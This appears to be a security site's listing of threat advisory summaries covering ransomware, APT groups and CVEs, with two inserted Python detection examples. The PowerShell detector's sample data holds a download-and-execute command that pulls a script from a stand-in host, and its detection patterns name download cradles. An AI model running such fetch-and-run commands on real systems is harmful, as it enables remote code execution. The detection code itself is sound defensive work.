Hivepro, sorted by most viewed

1589 matches found

hivepro | added 2023/04/19 7:35 a.m. | 30 views

FIN7 & Wizard Spider team up to disseminate Domino malware

Attack Report. Summary: FIN7 threat actors and Wizard Spider have collaborated to distribute the Domino malware family in recent attacks.

AI score 6.7 | Exploits: 0

hivepro | added 2023/04/05 10:09 a.m. | 30 views

Winter Vivern APT targets EU with Zimbra flaw

Attack Report. Summary: Winter Vivern abuses CVE-2022-27926 to attack public Zimbra webmail portals of government entities.

CVSS 4.3 | AI score 6.4 | EPSS 0.17252 | Exploits: 0

hivepro | added 2023/01/17 11:50 a.m. | 30 views

Rhadamanthys: A New Evasive Information Stealer

Attack Report. Summary: The Rhadamanthys evasive infostealer is spread through phishing emails and widely placed Google ads that lead to fake download pages for popular workforce software...

AI score 1.8 | Exploits: 0

hivepro | added 2023/01/05 1:58 p.m. | 30 views

Synology addresses the RCE vulnerability that affects VPN Plus servers

Vulnerability Report. Summary: Synology has addressed a flaw in VPN Plus Server that could allow an attacker to take control of affected systems. The vulnerability, identified as CVE-2022-43931, is an out-of-bounds write fault in Synolo...

AI score 5.8 | EPSS 0.16841 | Exploits: 0

hivepro | added 2022/10/31 10:45 a.m. | 30 views

LV Ransomware Exploited ProxyShell to target Jordan

Attack Report. Summary: LV ransomware-as-a-service has been active since late 2020. The most recent intrusion compromised the corporate environment of a Jordan-based entity, leveraging the double extortion...

AI score 1.6 | Exploits: 0

hivepro | added 2022/08/24 8:04 a.m. | 30 views

Multiple industries targeted by uptick of BianLian ransomware

Attack Report. Summary: Attackers are increasingly delivering BianLian, a new ransomware strain written in Go that was first spotted in mid-July 2022. Numerous well-known enterprises have been targeted, including those in...

AI score 3.1 | Exploits: 0

hivepro | added 2021/08/03 1:05 p.m. | 30 views

Major Hospitals affected by PwnedPiper Vulnerabilities

Threat Level: White. Multiple zero-day vulnerabilities, collectively named PwnedPiper, have been found affecting the HMI-3 Control Panel of Swisslog Healthcare’s TransLogic Pneumatic Tube System (PTS). A PTS is a specialized system that uses a compressor to transport...

CVSS 7.5 | AI score 9.8 | EPSS 0.03396 | Exploits: 0

hivepro | added 2024/03/21 5:46 a.m. | 29 views

Critical Flaw In WordPress Plugins Poses Risk Of Site Takeover

Summary: A critical security vulnerability, identified as CVE-2024-2172, affects the miniOrange Malware Scanner and Web Application Firewall plugins for WordPress; users of these plugins are urged to uninstall them from their websites. This vulnerability enables unauthenticated attackers to gain administrative...

CVSS 7.5 | AI score 7.2 | EPSS 0.01712 | Exploits: 1

hivepro | added 2024/02/27 7:17 a.m. | 29 views

Apple Shortcuts’ Secret Threat to Your Data

Summary: A security vulnerability, identified as CVE-2024-23204, has been found in Apple's Shortcuts application, allowing unauthorized access to sensitive information on a device by bypassing TCC (Transparency, Consent, and Control). Because users can export and share shortcuts, a malicious shortcut can spread easily, which heightens the susceptibility to potential...

CVSS 5 | AI score 6.8 | EPSS 0.01789 | Exploits: 0

hivepro | added 2024/01/24 9:39 a.m. | 29 views

NS-STEALER Utilizes Discord Bots for Covert Exfiltration of Sensitive Data

Summary: A recently discovered Java-based information stealer, named NS-STEALER, uses a Discord bot channel as an EventListener to exfiltrate sensitive data from compromised hosts. The malware is distributed through ZIP archives disguised as cracked software. Threat Level: Amb...

AI score 6.8 | Exploits: 0

hivepro | added 2023/12/14 8:27 a.m. | 29 views

Apple’s Timely Response to Actively Exploited Zero-Days

Summary: Apple has released crucial software updates to address two actively exploited security vulnerabilities identified as CVE-2023-42916 and CVE-2023-42917. These vulnerabilities affect the WebKit browser engine on Apple devices such as iPhone, iPad, and Mac, potentially exposing sensitive...

CVSS 6.8 | AI score 7 | EPSS 0.17963 | Exploits: 0

hivepro | added 2023/10/18 3:18 a.m. | 29 views

Unpatched Zero-Day Vulnerability Actively Exploited in Cisco IOS XE

Vulnerability Report. Summary: The critical, unpatched security vulnerability identified as CVE-2023-20198 affects Cisco IOS XE software. Cisco IOS XE is a network operating system used in Cisco network devices. The identified...

CVSS 7.5 | AI score 7.3 | EPSS 0.99571 | Exploits: 26

hivepro | added 2023/09/25 6:37 a.m. | 29 views

Sandman APT Strikes the Telecom Sector with the LuaDream Backdoor

Actor Report. Summary: Sandman APT, an espionage group of unknown origin that surfaced in August 2023, is orchestrating a sophisticated campaign aimed squarely at telecommunications providers across the Middle East,...

AI score 6.9 | Exploits: 0

hivepro | added 2023/09/19 6:36 a.m. | 29 views

APT 33 Uses Password Spray Campaigns to Infiltrate Organizations

Actor Report. Summary: APT33, also known as Peach Sandstorm, is an Iranian nation-state threat actor first identified in 2013. The group is notorious for conducting cyber espionage campaigns and has been associated with various...

AI score 6.9 | Exploits: 0

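The password-spray pattern named in this entry can be surfaced from authentication logs by looking for one source failing against many distinct accounts with only a few attempts per account, which is how a spray stays under per-account lockout thresholds. The following is an added example, not code from HiveForce Labs or from the advisory: the log line format and the sample lines are constructed for illustration, and the thresholds (five accounts inside a ten-minute window, at most two attempts per account) are assumptions to tune per environment.

```python
"""Password-spray detection over authentication log lines.

Added example. A spray is one source trying a few passwords against many
accounts, so the signal is "many distinct users failing from one source in
a short window", not "many failures against one user". The log format and
the sample lines below are constructed for this example and do not come
from any real product.
"""
import re
from collections import Counter, defaultdict, deque
from datetime import datetime, timedelta

# Constructed format: "<ISO timestamp> src=<ip> user=<name> result=<ok|fail>"
LINE_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>\S+) user=(?P<user>\S+) result=(?P<result>ok|fail)$"
)

# Constructed sample: 203.0.113.7 sprays six accounts once each and then logs
# in as frank; 198.51.100.9 brute-forces a single account (not a spray);
# 192.0.2.1 is a user mistyping a password once.
SAMPLE_LOG = """\
2023-09-18T08:00:01 src=203.0.113.7 user=alice result=fail
2023-09-18T08:00:03 src=203.0.113.7 user=bob result=fail
2023-09-18T08:00:05 src=203.0.113.7 user=carol result=fail
2023-09-18T08:00:08 src=203.0.113.7 user=dave result=fail
2023-09-18T08:00:11 src=203.0.113.7 user=erin result=fail
2023-09-18T08:00:14 src=203.0.113.7 user=frank result=fail
2023-09-18T08:01:02 src=203.0.113.7 user=frank result=ok
2023-09-18T08:02:00 src=198.51.100.9 user=alice result=fail
2023-09-18T08:02:01 src=198.51.100.9 user=alice result=fail
2023-09-18T08:02:02 src=198.51.100.9 user=alice result=fail
2023-09-18T08:02:03 src=198.51.100.9 user=alice result=fail
2023-09-18T08:02:04 src=198.51.100.9 user=alice result=fail
2023-09-18T08:02:05 src=198.51.100.9 user=alice result=fail
2023-09-18T08:05:00 src=192.0.2.1 user=grace result=fail
2023-09-18T08:05:20 src=192.0.2.1 user=grace result=ok
"""


def parse(lines):
    """Turn raw log lines into (timestamp, src, user, result) tuples."""
    events = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # ignore lines that do not match the expected format
        events.append((datetime.fromisoformat(m["ts"]), m["src"], m["user"], m["result"]))
    return events


def detect_spray(events, window=timedelta(minutes=10), min_users=5, max_per_user=2):
    """Return {src: [users]} for sources whose failures inside any sliding
    `window` cover at least `min_users` distinct accounts while no single
    account was tried more than `max_per_user` times (the low-and-slow
    spray signature; the thresholds are assumptions to tune per environment)."""
    fails_by_src = defaultdict(list)
    for ts, src, user, result in events:
        if result == "fail":
            fails_by_src[src].append((ts, user))

    flagged = {}
    for src, fails in fails_by_src.items():
        fails.sort()
        recent = deque()  # failures from this src inside the current window
        for ts, user in fails:
            recent.append((ts, user))
            while ts - recent[0][0] > window:
                recent.popleft()
            per_user = Counter(u for _, u in recent)
            if len(per_user) >= min_users and max(per_user.values()) <= max_per_user:
                flagged.setdefault(src, set()).update(per_user)
    return {src: sorted(users) for src, users in flagged.items()}


def successes_after_spray(events, flagged):
    """Accounts that logged in successfully from a flagged source after that
    source had already failed against them: the spray probably found a valid
    password, so these are the accounts to reset first."""
    first_fail = {}
    hits = defaultdict(set)
    for ts, src, user, result in sorted(events):
        if src not in flagged:
            continue
        key = (src, user)
        if result == "fail":
            first_fail.setdefault(key, ts)
        elif key in first_fail and ts > first_fail[key]:
            hits[src].add(user)
    return {src: sorted(users) for src, users in hits.items()}


if __name__ == "__main__":
    evts = parse(SAMPLE_LOG.splitlines())
    sprays = detect_spray(evts)
    for src, users in sprays.items():
        print(f"possible password spray from {src}: {len(users)} accounts {users}")
    for src, users in successes_after_spray(evts, sprays).items():
        print(f"  successful logins after spray from {src}: {users}")
```

The single-account brute force from 198.51.100.9 is deliberately not flagged: it trips ordinary lockout rules, whereas the spray from 203.0.113.7 would not, which is exactly why the distinct-user count is the metric to alert on. In production the source key is often a combination of IP and user agent or ASN rather than a bare IP, since sprayers rotate addresses.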
hivepro | added 2023/09/08 1:29 p.m. | 29 views

Agent Tesla’s New Variant Spreads Through Crafted Excel Files

Attack Report. Summary: A phishing campaign has surfaced, disseminating a new iteration of the Agent Tesla malware through a meticulously crafted Microsoft Excel document. This document exploits a longstanding memory corruption...

AI score 7 | Exploits: 0

hivepro | added 2023/08/18 4:50 p.m. | 29 views

AdLoad Malware Persists on Mac Systems with New Proxy Payload

Attack Report. Summary: AdLoad malware persists on Mac systems with a new proxy application payload, converting infected devices into a proxy botnet. This scheme, involving thousands of IP addresses, points to a monetization...

AI score 6.9 | Exploits: 0

hivepro | added 2023/05/30 11:16 a.m. | 29 views

A New RAT Named GobRAT Targeting Linux Routers in Japan

Attack Report. Summary: GobRAT, a new remote access trojan (RAT), is infecting Linux routers in Japan through vulnerable web interfaces, granting attackers remote control and the ability to execute commands.

AI score 7.2 | Exploits: 0

hivepro | added 2023/03/30 7:07 a.m. | 29 views

Donot APT Group Targets Government and Military Orgs in South Asia

Actor Report. Summary: The Donot group, also known as APT-Q-38, is a state-sponsored threat actor believed to operate out of a South Asian country. It primarily engages in network espionage activities targeting government...

AI score 6.7 | Exploits: 0

hivepro | added 2023/03/22 9:33 a.m. | 29 views

Bad Magic APT employs new CommonMagic Framework and PowerMagic Backdoor

Attack Report. Summary: A newly identified APT, Bad Magic, was discovered using a new backdoor called PowerMagic and a malicious framework called CommonMagic to target organizations in the administrative, agriculture, and transportation sectors...

AI score 6.7 | Exploits: 0

hivepro | added 2022/09/09 11:43 a.m. | 29 views

Lazarus deploys new attack tool, MagicRAT to target organizations worldwide

Attack Report. Summary: Lazarus, a North Korean threat actor, compromises vulnerable VMware Horizon servers and deploys MagicRAT, a new remote access tool developed by the attackers. MagicRAT creates scheduled tasks on...

AI score 2.7 | Exploits: 0

hivepro | added 2022/03/22 7:19 a.m. | 29 views

Berkeley Internet Name Domain (BIND) affected by multiple vulnerabilities

Threat Level: Amber. The Internet Systems Consortium (ISC) has published security updates to address several vulnerabilities in the widely used Berkeley Internet Name Domain (BIND) server software. An attacker could take advantage of some of these...

AI score 0.5 | EPSS 0.0325 | Exploits: 0

hivepro | added 2022/03/02 7:35 a.m. | 29 views

Multiple government entities targeted by China-linked Daxin malware

Threat Level: Red. Daxin, a technologically advanced and previously undocumented malware, was used by a China-linked advanced persistent threat (APT) actor against government and critical-infrastructure targets across the globe. This malware can re...

AI score 0.8 | Exploits: 0

hivepro | added 2021/12/25 2:52 a.m. | 29 views

Old Gatekeeper bypass vulnerability in macOS exploited

Threat Level: Amber. A Gatekeeper bypass vulnerability exists in macOS Big Sur and has been assigned CVE-2021-30853. An attacker can exploit this issue with a specially crafted script-based application downloaded from the Internet. This allow...

CVSS 4.3 | AI score 0.3 | EPSS 0.06998 | Exploits: 1

hivepro | added 2021/09/20 5:48 a.m. | 29 views

ManageEngine ADSelfService Plus has been abused in the wild due to a zero-day vulnerability

Threat Level: Red. An APT actor is attempting to exploit a zero-day vulnerability in ManageEngine ADSelfService Plus, a self-service password management and single sign-on solution. The vulnerability poses a high risk to critical infrastructure companies,...

AI score 1 | Exploits: 0

hivepro | added 2024/05/10 3:20 p.m. | 28 views

Google Chrome Fixes Zero-Day CVE-2024-4671 Exploited in the Wild

...

AI score 7.3 | EPSS 0.08348 | Exploits: 0

hivepro | added 2024/03/12 6:39 a.m. | 28 views

Cisco Secure Client Flaw Enables Attackers To Steal VPN Sessions

Summary: Cisco has addressed a high-severity vulnerability, tracked as CVE-2024-20337, in its Secure Client software that could allow a threat actor to establish a VPN session with the privileges of the targeted user. Threat Level: Red | Vulnerability Report

CVSS 5.8 | AI score 6.9 | EPSS 0.29906 | Exploits: 0

hivepro | added 2024/02/21 2:17 p.m. | 28 views

Admins Urged to Uninstall VMware EAP Amid Critical Flaws

Summary: VMware has warned administrators about two unpatched security vulnerabilities in a deprecated authentication plugin and urged them to remove it. Identified as CVE-2024-22245 and CVE-2024-22250, these vulnerabilities enable session hijacking and authentication relay attack...

CVSS 6.8 | AI score 7.7 | EPSS 0.01262 | Exploits: 0

hivepro | added 2024/01/23 7:42 a.m. | 28 views

Attacks, Vulnerabilities and Actors 15 January to 21 January 2024

Summary: HiveForce Labs has recently made several significant discoveries related to cybersecurity threats. Over the past week, we identified a total of six executed attacks, two instances of adversary activity, and eight exploited...

CVSS 6.8 | AI score 7.8 | EPSS 0.03769 | Exploits: 1

hivepro | added 2023/11/30 7:10 a.m. | 28 views

ParaSiteSnatcher A Silent Threat to Latin America

Summary: Multiple vulnerabilities have been discovered in Google Chrome, including CVE-2023-6345, a zero-day actively exploited for remote code execution. Users are advised to update Chrome to version 119.0.6045.199/.200 (Windows) or 119.0.6045.199 (Mac and Linux) promptly to safeguard...

CVSS 6.8 | AI score 8 | EPSS 0.1963 | Exploits: 0

hivepro | added 2023/11/22 8:50 a.m. | 28 views

The Rise of NetSupport RAT Recent Infections and Sector Impact

Summary: Threat actors are repurposing the legitimate NetSupport Manager remote administration tool as a Remote Access Trojan (RAT), driving a recent surge in infections across multiple sectors. The evolving attack chain involves deceptive website downloads, JavaScript payloads, and PowerShell commands, emphasizing the need for vigilant...

AI score 7.3 | Exploits: 0

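The attack chain summarized in this entry (a downloaded JavaScript payload that launches PowerShell) leaves a process-lineage signal that is cheap to hunt for: a Windows script host as the direct parent of powershell.exe. The following is an added example, not code from the advisory or from NetSupport; the process-creation records are constructed stand-ins for Sysmon Event ID 1 or EDR telemetry, and the command-line indicators it checks are general PowerShell tradecraft (encoded commands, hidden windows, no profile, in-memory downloads), not indicators from this specific campaign.

```python
"""Flag PowerShell launched by a Windows script host.

Added example. The process-creation records below are constructed stand-ins
for Sysmon Event ID 1 / EDR telemetry; the command-line indicators are general
PowerShell tradecraft, not indicators tied to any specific campaign.
"""
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}

# (pattern, label) pairs; each adds a reason to a finding when it matches
SUSPICIOUS = [
    (re.compile(r"(?i)(^|\s)-(e|ec|enc|encodedcommand)\b"), "encoded command"),
    (re.compile(r"(?i)-w(indowstyle)?\s+hidden"), "hidden window"),
    (re.compile(r"(?i)-nop(rofile)?\b"), "no profile"),
    (re.compile(r"(?i)downloadstring|invoke-webrequest|\biwr\b|net\.webclient"), "web download"),
]

# Constructed sample telemetry: pid, parent pid, image name, command line.
# pid 702 and 905 are the malicious chains; pid 810 is an admin's script.
SAMPLE_EVENTS = [
    {"pid": 400, "ppid": 1, "image": "explorer.exe", "cmd": "explorer.exe"},
    {"pid": 512, "ppid": 400, "image": "chrome.exe", "cmd": "chrome.exe"},
    {"pid": 640, "ppid": 400, "image": "wscript.exe",
     "cmd": r'wscript.exe "C:\Users\u\Downloads\Update.js"'},
    {"pid": 702, "ppid": 640, "image": "powershell.exe",
     "cmd": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0A"},
    {"pid": 810, "ppid": 400, "image": "powershell.exe",
     "cmd": r"powershell.exe -File C:\scripts\backup.ps1"},
    {"pid": 890, "ppid": 400, "image": "cscript.exe",
     "cmd": r'cscript.exe //nologo "C:\Users\u\Downloads\invoice.js"'},
    {"pid": 905, "ppid": 890, "image": "powershell.exe",
     "cmd": "powershell.exe -ExecutionPolicy Bypass -c \"IEX (New-Object Net.WebClient)"
            ".DownloadString('http://example.invalid/a.ps1')\""},
]


def find_script_host_powershell(events):
    """Return one finding for every powershell.exe whose direct parent is a
    script host, listing the command-line indicators that matched."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        if e["image"].lower() != "powershell.exe":
            continue
        parent = by_pid.get(e["ppid"])
        if parent is None or parent["image"].lower() not in SCRIPT_HOSTS:
            continue  # PowerShell started by explorer, a scheduler, etc. is normal
        reasons = [label for rx, label in SUSPICIOUS if rx.search(e["cmd"])]
        findings.append({
            "pid": e["pid"],
            "parent": parent["image"],
            "parent_cmd": parent["cmd"],
            "reasons": reasons,
        })
    return findings


if __name__ == "__main__":
    for f in find_script_host_powershell(SAMPLE_EVENTS):
        print(f"pid {f['pid']}: powershell.exe spawned by {f['parent']} "
              f"({f['parent_cmd']}); indicators: {', '.join(f['reasons']) or 'none'}")
```

The lineage check is the alert condition; the indicator labels only enrich it so an analyst can triage. Keeping the parent command line in the finding matters because it usually carries the path of the dropped .js file, which is the artifact to pull for analysis.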
hivepro | added 2023/11/21 6:12 a.m. | 28 views

Attacks, Vulnerabilities and Actors 13 November to 19 November 2023

Summary: HiveForce Labs recently made several significant discoveries in the realm of cybersecurity threats. In the past week alone, a total of nine attacks were executed, twelve vulnerabilities were uncovered, and four active adversaries we...

AI score 7.4 | Exploits: 0

hivepro | added 2023/10/19 6:23 a.m. | 28 views

Multiple State-Sponsored Groups Exploit WinRAR Vulnerability in Phishing Attacks

Attack Report. Summary: A series of phishing attacks linked to a Russian state-sponsored group leverages a WinRAR vulnerability to steal data, including browser credentials collected via PowerShell commands, and exfiltrates it through ...

AI score 7.4 | Exploits: 0

hivepro | added 2023/10/14 8:40 a.m. | 28 views

Microsoft’s October 2023 Patch Tuesday Addresses Three Zero-day Vulnerabilities

Vulnerability Report. Summary: In the October Patch Tuesday release, Microsoft addressed 103 flaws, including three actively exploited zero-day vulnerabilities. These patches cover critical and important vulnerabilities, a...

AI score 6.8 | Exploits: 0

hivepro | added 2023/10/14 8:18 a.m. | 28 views

Unveiling Lu0Bot Malware A Node.js-Based Threat

Attack Report. Summary: Lu0Bot malware, a Node.js-based threat, surfaced in February 2021 as a secondary payload in GCleaner attacks. This malware acts as a bot, responding to C2 server commands and transmitting encrypted syste...

AI score 6.9 | Exploits: 0

hivepro | added 2023/10/14 8:13 a.m. | 28 views

Deciphering Mirai’s Next Chapter: the Strategies of the Latest Players

Attack Report. Summary: Several formidable botnet variants derived from the notorious Mirai source code have emerged. Prominent among them are hailBot, kiraiBot, and catDDoS, showcasing heightened...

AI score 6.9 | Exploits: 0

hivepro | added 2023/09/21 6:05 a.m. | 28 views

Trend Micro Addresses Zero-Day Flaws Exploited in the Wild

Vulnerability Report. Summary: A critical zero-day vulnerability, tracked as CVE-2023-41179, has been identified in the third-party AV uninstaller module contained in Trend Micro Apex One, Worry-Free Business Security, and...

AI score 8.1 | EPSS 0.04739 | Exploits: 0

hivepro | added 2023/08/29 6:03 a.m. | 28 views

Chinese Hacking Group ‘Flax Typhoon’ Targeting Taiwan Organizations

Actor Report. Summary: Flax Typhoon, a Chinese nation-state actor, employs sophisticated tactics to target organizations in Taiwan for espionage, utilizing living-off-the-land techniques and legitimate tools to maintain long-te...

AI score 6.8 | Exploits: 0

hivepro | added 2023/05/25 12:58 p.m. | 28 views

Pikabot A Stealthy Backdoor with Ingenious Evasion Tactics

Attack Report. Summary: Pikabot, a sophisticated backdoor, evades analysis with anti-analysis measures such as sleep-based delays and use of the NtContinue API, stops executing when certain system language settings are detected, and shows connections to Qakbot...

AI score 7 | Exploits: 0

hivepro | added 2023/03/14 1:08 p.m. | 28 views

IceFire Ransomware Strikes Linux-Powered Enterprise Networks

Attack Report. Summary: A new Linux variant of IceFire ransomware is being distributed by exploiting a deserialization flaw in IBM Aspera Faspex, targeting the networks of media and entertainment firms...

AI score 2.5 | Exploits: 0

hivepro | added 2023/01/27 11:13 a.m. | 28 views

CRYPTBOT Information-Stealing Malware Targeting Your Browser and Crypto-Wallet

Attack Report. Summary: CRYPTBOT is malware that steals personal information by gathering browser credentials, cookies, cryptocurrency wallets, and system information. It then compresses the collected data into a zip file and...

AI score 1.4 | Exploits: 0

hivepro | added 2023/01/19 1:42 p.m. | 28 views

APT15 enhanced its arsenal with an updated variant of the Turian backdoor

Attack Report. Summary: APT15 has modified its toolkit to include new variants of the Turian backdoor, as well as new command and control infrastructure. The malware is packed with VMProtect, which obfuscates all API calls within the...

AI score 2.4 | Exploits: 0

hivepro | added 2022/09/02 6:34 a.m. | 28 views

APT40 deployed ScanBox malware to target the Australian government

Actor Report. Summary: APT40 is a Chinese cyber-espionage group that uses phishing campaigns to target Australian government institutions and wind turbine operators in the South China Sea, directing selected individuals to a...

AI score 2.2 | Exploits: 0

hivepro | added 2022/02/17 8:28 a.m. | 28 views

BlackCat Ransomware group attacks on the rise

Threat Level: Red. The BlackCat ransomware gang, also known as ALPHV, has targeted around 25 organizations across multiple sectors globally since November 2021. The group has claimed responsibility for the recent cyberattack on Swissport...

AI score 6.8 | Exploits: 0

hivepro | added 2022/01/06 5:31 a.m. | 28 views

High severity vulnerability in VMware Workstation, Fusion, and ESXi

Threat Level: Amber. A heap buffer overflow vulnerability has been discovered in multiple VMware products. The bug, tracked as CVE-2021-22045, would allow an attacker to execute arbitrary code if exploited. Heap...

CVSS 6.9 | AI score 1.5 | EPSS 0.04681 | Exploits: 0

hivepro | added 2024/03/29 8:32 a.m. | 27 views

UNC5174 Functions as an Initial Access Broker, Exploiting Vulnerabilities

Summary: UNC5174, a threat actor believed to be associated with China, has been identified exploiting various vulnerabilities and deploying custom tools such as SNOWLIGHT, GOHEAVY, and GOREVERSE for post-exploitation activities. These tools enable UNC5174 to carry out sophisticated cyber...

AI score 7.3 | Exploits: 0

hivepro | added 2024/03/29 8:29 a.m. | 27 views

Sysrv Harnessing Google Subdomains to Circulate XMRig

Summary: Sysrv, an advanced botnet, uses a Golang worm to infiltrate devices and deploy XMRig cryptocurrency miners, exploiting network-reachable vulnerabilities and continually evolving as its operators refine it. Threat Level: Red | Attack Report

AI score 7.4 | Exploits: 0

hivepro | added 2024/02/08 5:54 a.m. | 27 views

FritzFrog Expanding Its Lethal Reach with Frog4Shell

Summary: Recent iterations of the Golang-based FritzFrog botnet employ an exploit called Frog4Shell, which capitalizes on the Log4Shell vulnerability. Threat Level: Red | Attack Report

AI score 7.2 | Exploits: 0

hivepro | added 2023/11/01 10:43 a.m. | 27 views

Hackers Utilize MSIX App Packages to Disseminate GHOSTPULSE Malware

Attack Report. Summary: A new cyber attack campaign has emerged, involving the use of fake MSIX Windows app packages masquerading as legitimate applications. These deceptive MSIX packages are employed to distribute a new malwar...

AI score 7.2 | Exploits: 0

hivepro | added 2023/09/28 6:42 a.m. | 27 views

TAG-74’s Multi-Year Campaign Targets South Korean Organizations

Actor Report. Summary: TAG-74 is a state-sponsored cyber-espionage group that has been attributed to Chinese military intelligence. This threat actor has been involved in a multi-year campaign primarily targeting organizations ...

AI score 6.8 | Exploits: 0

hivepro | added 2023/09/22 6:04 a.m. | 27 views

Deceptive WinRAR PoC Released on GitHub Drops VenomRAT

Attack Report. Summary: A threat actor is distributing on GitHub a counterfeit proof-of-concept (PoC) exploit for a recently patched WinRAR vulnerability, with the intention of infecting those who download it with the VenomRA...

AI score 6.9 | Exploits: 0

Total number of security vulnerabilities: 1589